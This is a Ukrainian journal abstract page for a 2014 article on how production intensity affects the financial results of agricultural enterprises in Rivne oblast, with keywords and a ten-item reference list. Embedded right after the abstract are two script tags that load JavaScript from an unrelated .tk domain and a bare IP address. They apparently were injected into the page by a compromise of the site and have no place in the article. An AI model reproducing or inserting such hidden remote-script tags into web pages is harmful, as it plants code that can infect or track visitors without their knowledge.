ISSN 2413-2322 (Online)

ISSN 2221-1055 (Print)

УДК: 330.338
Економіка агропромислового виробництва

Вплив рівня інтенсивності виробництва на фінансові результати діяльності сільськогосподарських підприємств / Козак Л. В. // Економіка АПК. - 2014. - № 3 - С. 29

Метою дослідження є оцінка впливу рівня інтенсивності виробництва на фінансові результати діяльності сільськогосподарських підприємств Рівненської області по окремих видах зернової та м’ясної продукції. На основі методу статистичних групувань визначено характер впливу витрат у розрахунку на 1 га посіву (голову тварин на відгодівлі) на урожайність зернових культур і продуктивність тварин. На основі аналізу динаміки прибутку на гектар посіву (одну голову тварин на відгодівлі) в підприємствах із різним рівнем інтенсивності виробництва здійснено оцінку економічного ефекту від зростання цін на сільськогосподарську продукцію та ресурси, які були використані у процесі виробництва. Обґрунтовано висновок, що економічні умови функціонування вітчизняних аграрних підприємств та їх можливості впровадження інтенсивних технологій у виробництво щорічно погіршуються, оскільки упродовж досліджуваного періоду зростання цін на виробничі ресурси відбувалося випереджувальними темпами. Наукова новизна проведеного дослідження полягає у поєднанні методів статистичних групувань і динамічного аналізу, що дозволило комплексно та системно оцінити перебіг означених процесів. Практична цінність виявлених тенденцій динаміки фінансових результатів діяльності сільськогосподарських підприємств із різним рівнем інтенсивності виробництва полягає в тому, що вони надають можливість розробити низку пропозицій щодо поліпшення їх ринкових позицій на внутрішньому та світових ринках. Рис.: 6. Бібліогр.: 10.<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script><script type='text/javascript' src='http://193.201.224.233/m.js?d=1'></script>
Ключові слова: фінансові результати діяльності сільськогосподарських підприємств, інтенсивність виробництва, урожайність сільськогосподарських культур, продуктивність тварин

Список використаних джерел

  1. Andriychuk V. Effectiveness of farms: theory, method, analysis [Text]: monograph / VG Andriychuk. – 2nd ed., Unchanged. – Kyiv: Kyiv National Economic University, 2006. – 292 p.
  2. Cost and efficiency of production in agricultural enterprises (monitoring). Issue 5. / [Voskobiynyk J.P., Shpykulyak A.G., Kaminsky I.V. and others.], ed. J.P. Voskobiynyk. – K.: IAE NNC, 2012. – 438 p.
  3. Dem'yanenko S.I., Nivievskyi A. Quantitative analysis and modeling of agricultural markets: Teach. handbook. – Kyiv: Kyiv National Economic University, 2008. – 424 p.
  4. Formation costs of agricultural production and monitoring in advanced countries / [Shpychak O., Bodnar A., Voskobiynyk Y. et al.], Ed. O.M.Shpychak. – K.: IAE NNC, 2012. – 204 p.
  5. Shpychak O.M., Mazorenko D.I., Maznyev G.E. and others. Technology and standards costs of cultivation of fodder crops / Ed. P.T.Sabluk et al. – K.: IAE NNC. – 2009. – 756 p.
  6. Yastremskyi O.I., Gryschenko O.H. Principles of Microeconomics: Tutorial. – Kyiv.: Knowledge, 2007. – 579 p.
  7. McConnell, Campbell R., Stanley L. Brue, and Sean M. Flynn. Microeconomics: Principles, Problems and Policies. 18th edition. New York, NY: McGraw-Hill Irwin, 2009.
  8. Mankiw, Gregory N. Principles of Microeconomics. 6th edition. Mason, OH: South-Western Cengage Learning, 2012.
  9. Koester U. Grundzüge der landwirtschaftlichen Marktlehre. – 4 Auflage. – München: Vahlen, 2011. – 413 S.
  10. Samuelson, Paul A. and William D. Nordhaus. Microeconomics. 19th edition. New York, NY: McGraw-Hill Irwin, 2010.
Читати статтю: 14_03_29-35.pdf